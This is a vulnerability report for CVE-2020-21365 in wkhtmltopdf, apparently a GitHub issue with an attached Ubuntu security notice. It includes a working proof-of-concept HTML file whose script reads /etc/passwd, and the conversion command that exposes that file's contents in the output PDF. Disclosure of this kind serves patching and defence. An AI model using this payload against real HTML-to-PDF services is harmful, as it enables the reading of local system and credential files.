Headline
CVE-2020-21365: The same origin policy allows local files to be read by default · Issue #4536 · wkhtmltopdf/wkhtmltopdf
Directory traversal vulnerability in wkhtmltopdf through 0.12.5 allows remote attackers to read local files and disclose sensitive information via a crafted html file running with the default configurations.
wkhtmltopdf version(s) affected:
all version ( <=0.12.5 )
OS information
All supported OS
Description
Because the same-origin policy is not strict enough, the html files under the file domain can read any files.
How to reproduce
Create an HTML file named 111.html
The file contents are as follows.
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<body>
<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script>
</body></html>
Convert HTML to PDF:
wkhtmltopdf /tmp/111.html /tmp/result.pdf
Expected behavior
View the file named result.pdf contents, you will see the contents of the file /etc/passwd!
Possible Solution
Make a strict same-origin policy or set a security option, to prevent HTML documents under the file domain from reading any files.
Related news
Ubuntu Security Notice 6232-1 - It was discovered that wkhtmltopdf was not properly enforcing the same-origin policy when processing certain HTML files. If a user or automated system using wkhtmltopdf were tricked into processing a specially crafted HTML file, an attacker could possibly use this issue to expose sensitive information.